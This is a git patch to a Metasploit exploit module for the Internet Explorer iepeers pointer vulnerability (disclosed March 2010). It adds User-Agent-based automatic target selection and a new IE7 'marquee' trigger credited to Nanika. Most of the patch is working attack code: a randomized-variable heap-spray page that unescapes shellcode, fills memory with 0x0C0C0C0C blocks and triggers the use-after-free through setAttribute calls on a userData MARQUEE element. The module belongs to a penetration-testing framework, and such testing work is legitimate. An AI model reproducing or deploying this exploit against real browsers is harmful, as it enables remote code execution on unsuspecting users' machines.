From 79e277450a7650032fea45fdfd760b611d424192 Mon Sep 17 00:00:00 2001
From: Joshua Drake <github.jdrake@qoop.org>
Date: Sat, 27 Mar 2010 01:31:19 +0000
Subject: [PATCH] add reliable IE7 trigger from Nanika

git-svn-id: file:///home/svn/framework3/trunk@8935 4d416f70-5f16-0410-b530-b9f4589650da
---
 .../windows/browser/ie_iepeers_pointer.rb     | 114 ++++++++++++++++--
 1 file changed, 102 insertions(+), 12 deletions(-)

diff --git a/modules/exploits/windows/browser/ie_iepeers_pointer.rb b/modules/exploits/windows/browser/ie_iepeers_pointer.rb
index 0b0a67ad6e..b8a3df8812 100644
--- a/modules/exploits/windows/browser/ie_iepeers_pointer.rb
+++ b/modules/exploits/windows/browser/ie_iepeers_pointer.rb
@@ -47,6 +47,7 @@ class Metasploit3 < Msf::Exploit::Remote
 				[
 					'unknown',                         # original discovery
 					'Trancer <mtrancer[at]gmail.com>', # metasploit module
+					'Nanika',                          # HIT2010 IE7 reliable PoC
 					'jduck'                            # minor cleanups
 				],
 			'Version'        => '$Revision$',
@@ -72,39 +73,93 @@ class Metasploit3 < Msf::Exploit::Remote
 			'Platform'       => 'win',
 			'Targets'        =>
 				[
-					[ 'Windows XP SP0-SP3 / IE 6.0 SP0-2 & IE 7.0', { 'Ret' => 0x0C0C0C0C } ]
+					[ '(Automatic) IE6, IE7 on Windows NT, 2000, XP, 2003 and Vista',
+						{
+							'Method' => 'automatic'
+						}
+					],
+
+					[ 'IE 6 SP0-SP2 (onclick)',
+						{
+							'Method' => 'onclick',
+							'Ret' => 0x0C0C0C0C
+						}
+					],
+
+					# "A great celebration of HIT2010" - http://www.hitcon.org/
+					[ 'IE 7.0 (marquee)',
+						{
+							'Method' => 'marquee',	
+							'Ret' => 0x0C0C0C0C
+						} 
+					],
 				],
 			'DisclosureDate' => 'Mar 09 2010',
 			'DefaultTarget'  => 0))
 	end
 
+
+	def auto_target(cli, request)
+		mytarget = nil
+
+		agent = request.headers['User-Agent']
+		#print_status("Checking user agent: #{agent}")
+		if agent =~ /Windows NT 6\.0/
+			mytarget = targets[2]   # IE7 on Vista
+		elsif agent =~ /MSIE 7\.0/
+			mytarget = targets[2]   # IE7 on XP and 2003
+		elsif agent =~ /MSIE 6\.0/
+			mytarget = targets[1]   # IE6 on NT, 2000, XP and 2003
+		else
+			print_error("Unknown User-Agent #{agent} from #{cli.peerhost}:#{cli.peerport}")
+		end
+
+		mytarget
+	end
+
+
 	def on_request_uri(cli, request)
 
+		if target['Method'] == 'automatic'
+			mytarget = auto_target(cli, request)
+			if (not mytarget)
+				send_not_found(cli)
+				return
+			end
+		else
+			mytarget = target
+		end
+
 		# Re-generate the payload
 		return if ((p = regenerate_payload(cli)) == nil)
 
+		print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport} (target: #{mytarget.name})...")
+
 		# Encode the shellcode
-		shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))
+		shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(mytarget.arch))
 
 		# Set the return\nops
-		ret  	  = Rex::Text.to_unescape([target.ret].pack('V'))
+		ret  	    = Rex::Text.to_unescape([mytarget.ret].pack('V'))
 
 		# Randomize the javascript variable names
 		j_shellcode	 = rand_text_alpha(rand(100) + 1)
 		j_nops		 = rand_text_alpha(rand(100) + 1)
 		j_slackspace = rand_text_alpha(rand(100) + 1)
 		j_fillblock	 = rand_text_alpha(rand(100) + 1)
-		j_memory	 = rand_text_alpha(rand(100) + 1)
+		j_memory	    = rand_text_alpha(rand(100) + 1)
 		j_counter	 = rand_text_alpha(rand(30) + 2)
-		j_ret		 = rand_text_alpha(rand(100) + 1)
+		j_ret		    = rand_text_alpha(rand(100) + 1)
 		j_array		 = rand_text_alpha(rand(100) + 1)
 		j_function1	 = rand_text_alpha(rand(100) + 1)
 		j_function2	 = rand_text_alpha(rand(100) + 1)
-		j_object	 = rand_text_alpha(rand(100) + 1)
-		j_id		 = rand_text_alpha(rand(100) + 1)
+		j_object	    = rand_text_alpha(rand(100) + 1)
+		j_id		    = rand_text_alpha(rand(100) + 1)
 
-		# Build out the message
-		html = %Q|<html><body>
+		# Construct the final page
+		case mytarget['Method']
+
+		when 'onclick'
+			html = %Q|<html><body>
 <button id='#{j_id}' onclick='#{j_function2}();' style='display:none'></button>
 <script language='javascript'>
 function #{j_function1}(){
@@ -136,7 +191,42 @@ document.getElementById('#{j_id}').onclick();
 </script></body></html>
 |
 
-		print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...")
+		when 'marquee'
+			j_attrib = rand_text_alpha(6);
+			html = %Q|<html>
+<head>
+<style type="text/css">
+.#{j_object} {behavior: url(#default#userData);}
+</style>
+</head>
+<script>
+function #{j_function1}(){
+ var #{j_shellcode} = unescape('#{shellcode}');
+ #{j_memory} = new Array();
+ var #{j_slackspace} = 0x86000-(#{j_shellcode}.length*2);
+ var #{j_nops} = unescape('#{ret}');
+ while(#{j_nops}.length<#{j_slackspace}/2) { #{j_nops}+=#{j_nops}; }
+ var #{j_fillblock} = #{j_nops}.substring(0,#{j_slackspace}/2);
+ delete #{j_nops};
+ for(#{j_counter}=0; #{j_counter}<270; #{j_counter}++) {
+  #{j_memory}[#{j_counter}] = #{j_fillblock} + #{j_fillblock} + #{j_shellcode};
+ }
+}
+function #{j_function2}() {
+ #{j_function1}();
+ for (#{j_counter} = 1; #{j_counter} <10; #{j_counter} ++ ){
+  #{j_id}.setAttribute("#{j_attrib}",document.location);
+ }
+ #{j_id}.setAttribute("#{j_attrib}",document.getElementsByName("style"));
+ document.location="about:\\u0c0c\\u0c0c\\u0c0c\\u0c0cblank";
+}
+</script>
+<body onload="#{j_function2}();"></body>
+<MARQUEE id="#{j_id}" class="#{j_object}"></MARQUEE>
+</html>
+|
+
+		end
 
 		# Transmit the compressed response to the client
 		send_response(cli, html, { 'Content-Type' => 'text/html' })
@@ -146,5 +236,5 @@ document.getElementById('#{j_id}').onclick();
 
 	end
 
-end
-
+end
+